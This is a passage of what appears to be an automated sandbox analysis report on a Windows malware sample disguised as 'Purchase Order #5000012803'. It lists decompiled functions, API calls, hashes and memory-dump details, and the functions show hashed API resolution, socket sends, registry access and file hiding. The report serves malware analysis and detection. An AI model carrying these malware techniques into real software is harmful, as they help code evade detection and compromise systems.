                      • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402BAB, Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00402BAB(void* _a4) {
				void* _t3;
				char _t5;

				if(_a4 != 0) {
					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
					return _t5;
				}
				return _t3;
			}





                      0x00402bb2
                      0x00402bc0
                      0x00000000
                      0x00402bc0
                      0x00402bc7

                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                      • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$FreeProcess
                      • String ID:
                      • API String ID: 3859560861-0
                      • Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                      • Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
                      • Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                      • Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004060BD, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                      Download Yara Rule
                      C-Code - Quality: 40%
                      			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}













                      0x004060c6
                      0x004060d5
                      0x004060d8
                      0x004060f4
                      0x004060f6
                      0x004060fb
                      0x0040610a
                      0x00406115
                      0x0040611c
                      0x0040611e
                      0x00406121
                      0x00000000
                      0x0040612a
                      0x0040612f

                      APIs
                      • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: CheckMembershipToken
                      • String ID:
                      • API String ID: 1351025785-0
                      • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                      • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                      • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                      • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403C62, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}





                      0x00403c68
                      0x00403c70
                      0x00403c78
                      0x00403c82
                      0x00403c8b
                      0x00403c8f
                      0x00403c72
                      0x00403c76
                      0x00403c76

                      APIs
                      • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateDirectory
                      • String ID:
                      • API String ID: 4241100979-0
                      • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                      • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                      • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                      • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040642C, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                      Download Yara Rule
                      C-Code - Quality: 37%
                      			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}






                      0x0040643c
                      0x00406445
                      0x00406454

                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID:
                      • API String ID: 1721193555-0
                      • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                      • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                      • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                      • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404EEA, Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                      Download Yara Rule
                      C-Code - Quality: 37%
                      			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}




                      0x00404eed
                      0x00404ef2
                      0x00404efd
                      0x00404efd
                      0x00404f07
                      0x00404f0e

                      APIs
                      • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: send
                      • String ID:
                      • API String ID: 2809346765-0
                      • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                      • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                      • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                      • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403BD0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}





                      0x00403bdd
                      0x00403beb
                      0x00403bee

                      APIs
                      • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileMove
                      • String ID:
                      • API String ID: 3562171763-0
                      • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                      • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                      • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                      • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                      Download Yara Rule
                      APIs
                      • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Startup
                      • String ID:
                      • API String ID: 724789610-0
                      • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                      • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                      • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                      • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040427D, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}





                      0x0040428a
                      0x00404297
                      0x0040429a

                      APIs
                      • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                      • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                      • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                      • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404A19, Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}





                      0x00404a27
                      0x00404a35
                      0x00404a38

                      APIs
                      • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Open
                      • String ID:
                      • API String ID: 71445658-0
                      • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                      • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                      • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                      • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403C40, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}





                      0x00403c4d
                      0x00403c55
                      0x00403c58

                      APIs
                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: ChangeCloseFindNotification
                      • String ID:
                      • API String ID: 2591292051-0
                      • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                      • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                      • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                      • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403C08, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}





                      0x00403c15
                      0x00403c1d
                      0x00403c20

                      APIs
                      • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: DeleteFile
                      • String ID:
                      • API String ID: 4033686569-0
                      • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                      • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                      • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                      • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402C1F, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}





                      0x00402c2c
                      0x00402c34
                      0x00402c37

                      APIs
                      • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                      • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                      • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                      • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403BEF, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}





                      0x00403bfc
                      0x00403c04
                      0x00403c07

                      APIs
                      • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseFind
                      • String ID:
                      • API String ID: 1863332320-0
                      • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                      • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                      • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                      • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403BB7, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}





                      0x00403bc4
                      0x00403bcc
                      0x00403bcf

                      APIs
                      • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                      • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                      • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                      • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004049FF, Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}





                      0x00404a0d
                      0x00404a15
                      0x00404a18

                      APIs
                      • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID:
                      • API String ID: 3535843008-0
                      • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                      • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                      • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                      • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403B64, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}





                      0x00403b72
                      0x00403b7a
                      0x00403b7d

                      APIs
                      • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExistsFilePath
                      • String ID:
                      • API String ID: 1174141254-0
                      • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                      • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                      • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                      • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404DE5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                      Download Yara Rule
                      APIs
                      • closesocket.WS2_32(00404EB0), ref: 00404DEB
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: closesocket
                      • String ID:
                      • API String ID: 2781271927-0
                      • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                      • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                      • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                      • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403F9E, Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}





                      0x00403fac
                      0x00403fba
                      0x00403fbe

                      APIs
                      • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeVirtual
                      • String ID:
                      • API String ID: 1263568516-0
                      • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                      • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                      • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                      • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00406472, Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}





                      0x0040647f
                      0x00406487
                      0x0040648a

                      APIs
                      • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                      • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                      • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                      • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004058EA, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}





                      0x004058f8
                      0x00405903
                      0x00405906

                      APIs
                      • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
